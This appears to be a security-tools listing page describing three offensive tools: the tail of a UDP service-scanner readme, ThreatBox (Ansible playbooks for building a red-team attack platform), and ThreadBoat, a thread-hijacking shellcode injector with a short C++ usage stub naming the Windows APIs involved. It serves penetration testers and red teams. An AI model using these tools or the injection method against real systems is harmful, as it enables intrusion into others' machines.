  • --ports - List of ports or 'all' (default: all ports) (Optional)
  • --retries - Number of packets to send to each host. Default 2 (Optional)
  • --noise - To filter output from non-listed IPs (Optional)
  • --verbose - verbosity, will show sniffer output also --- please keep this a true, by default this is true. This will help us to analyze output.
  • --timeout - Timeout 1.0, 2.0 in minutes (Optional)
  • --lhost6 - Provide IPv6 of listner interface
  • --lhost4 - Provide IPv4 of listner interface
  • --configfile - Configuration file location - default is 'udp.txt' in same directory
  • --probehelp - Help file location - default is 'udphelp.txt' in same directory

Usage:

Usage: python udp-hunter.py --file=inputfile.txt --output=outputfile.txt [optional arguments] Usage: python udp-hunter.py --file=inputfile.txt --output=outputfile.txt [--probes=NTPRequest,SNMPv3GetReques] [--ports=123,161,53] [--retries=3] [--noise=true] [--verbose=false] [--timeout=1.0] [--configfile]


Credits:

The UDP probes are mainly taken from amap, ike-scan, nmap and udp-proto-scanner. Inspiration for the scanning code was drawn from udp-proto-scanner.


Future Work:
  • Addition of more UDP probes
  • Different reporting formats
  • Update exploitation-related helps

Read More:


ThreatBox - A Standard And Controlled Linux Based Attack Platform

22 November 2021 at 20:30
By: Zion3R


ThreatBox is a standard and controlled Linux based attack platform. I've used a version of this for years. It started as a collection of scripts, lived as a rolling virtual machine, existed as code to build a Linux ISO, and has now been converted to a set of ansible playbooks. Why Ansible? Why not? This seemed to be the next natural evolution to the configuration of standard attack platforms.

This project uses ansible playbooks and roles to perform post deployment configuration on a linux target (Tested on Ubuntu 18.04).

The project is designed to be used as a starter process in creating, managing, and using a standard attack platform for red teaming or penetration testing.

Detail on the concept of a Standard Attack Platform can be found it the book Red Team Development and Operations - A practical guide, written by Joe Vest and James Tubberville.Β 


Features
  • Standard tools defined as ansible roles
  • Customizations designed to make security testing easier
  • Variable list to add or remove git repositories, OS packages, or python modules. (threatbox.yml)
  • Version tracking of the deployed instance version and the deploy tool version. This is helpful it meeting compliance rules and can help minimize fear by actively tracking all tools.
    • Threatbox version created at deployment and displayed in desktop wallpaper
    • Deployed software tracked in ~/Desktop/readme
  • SSH port auto-switching. The deployment starts on port 22, but reconfigures the target system to the desired SSH port using the ansible_port variable in threatbox.yml
  • Download and compile several .net toolkits (i.e. SeatBelt.exe from Ghostpack https://github.com/GhostPack/Seatbelt)
  • Most python projects installed using pipenv. Use pipenv shell in the project directory to access. See https://realpython.com/pipenv-guide/ for pipenv usage guidance

Project Files

The following list highlights key components of this project.

File/Directory Description Usage
host Ansible hosts file Update with IP addresses of target ansible systems
group_vars/threatbox.yml common variables variable used for the project. update as needed.
threatbox_playbox.yml Primary ansible playbook Update as need to add additional roles or features
roles/common Common OS platform configuration Setup common OS settings (i.e set version in background or build)
roles/. other specific roles to configure or deploy tools add or modify roles in roles/

Quickstart

Provision

Provision one or more targets.

Note: This project was tested on Ubuntu 18.04 deployed in Digitalocean


Configuration
  1. Copy hosts.sample to hosts
  2. Edit hosts with the IP(s) of your target systems
  3. Copy group_vars\threatbox.yml.sample to group_vars\threatbox.yml
  4. Edit group_vars\threatbox.yml with the updated variables you would like to use
    • Don't forget to update SSH key with a key that has access to the remote target

Ansible commands
# OSX issue https://github.com/ansible/ansible/issues/32499
if [[ "$(uname)" == "Darwin" ]]
then
export OBJC_DISABLE_INITIALIZE_FORK_SAFETY=yes;
fi

# Ansible Logging
rm ./ansible.log
export ANSIBLE_LOG_PATH="ansible.log"

# Ansible Debugging
export ANSIBLE_DEBUG=False

# Execute playbook
ansible-playbook -e ansible_python_interpreter=/usr/bin/python3 -i hosts threatbox_playbook.yml

Note: Consider using Mitogen for Ansible to gain a significant performance boost. https://mitogen.networkgenomics.com/ansible_detailed.html


Tested with this ansible.cfg
[defaults]
host_key_checking = False
pipelining = True
forks = 100
timeout = 600
stdout_callback = yaml
bin_ansible_callbacks = True
callback_whitelist = profile_roles, profile_tasks, timer

#mitogen
strategy_plugins = ~/Documents/mitogen-0.2.9/ansible_mitogen/plugins/strategy
strategy = mitogen_linear

Remotely Access the system

Console access with SSH

Note: SSH may be set to a non-standard port during setup. This value is set in the group_vars/threatbox.yml files

threatboxip=10.10.10.10
sshport=52222
ssh -p $sshport -i ~/.ssh/threatbox_id_rsa [email protected]$threatboxip

GUI Access with VNC over SSH

Note: VNC is setup but not allowed over the network. You must use an SSH tunnel to access.

threatboxip=10.10.10.10
sshport=52222
ssh -p $sshport -i ~/.ssh/threatbox_id_rsa -L 5901:localhost:5901 [email protected]$threatboxip

Notes on the project

This project uses ansbile roles. These roles may not exactly follow the ansible style. They were designed to be used as part of this project and use a single 'variable' file to control the project. The roles can easily be used in other project with minor tweaks.


Features

ThreatBox Custom Commands


Tool Categories


Tracking of all installed tools


Automatic terminal logging


Custom terminal options provide more context


Light version of the terminalΒ 

Pipenv keep Python projects independent


Example of SilentTrinity running in pipenv environment



ThreadBoat - Program Uses Thread Execution Hijacking To Inject Native Shell-code Into A Standard Win32 Application

22 November 2021 at 11:30
By: Zion3R


Program uses Thread Hijacking to Inject Native Shellcode into a Standard Win32 Application.


About

I developed this small project to continue my experiences of different code injection methods and to allow RedTeam security professionals to utilize this method as a unique way to perform software penetration testing. With Thread hijacking, it allows the hijacker.exe program to susepend a thread within the target.exe program allowing us to write shellcode to that target thread, and later be executed (via; WriteProcessMemory(), SetThreadContext(), ResumeThread(), CreateThread()).


Example GIF (Credits To Endgame)



Usage
int main()
{
System sys;
Interceptor incp;
Exception exp;

sys.returnVersionState();
if (sys.returnPrivilegeEscalationState())
{
std::cout << "Token Privileges Adjusted\n";
}

if (DWORD m_procId = incp.FindWin32ProcessId((PCHAR)m_win32ProcessName))
{
incp.ExecuteWin32Shellcode(m_procId);
}

system("PAUSE");
return 0;
}

For Further Information On Thread Execution Hijacking

Click On The Link Below

https://capec.mitre.org/data/definitions/30.html


Environment
  • Windows Vista+
  • Visual C++

Libs
  • Winapi

    • user32.dll
    • kernel32.dll
  • ntdll.dll


Ethical Notice

This code was simply written to demonstrate an overlooked method to inject shellcode or a DLL into a Win32 program. This code is not to be used for malicous purposes. The author, Josh Schiavone, is not liable for misuse of this software. May God bless you all.



❌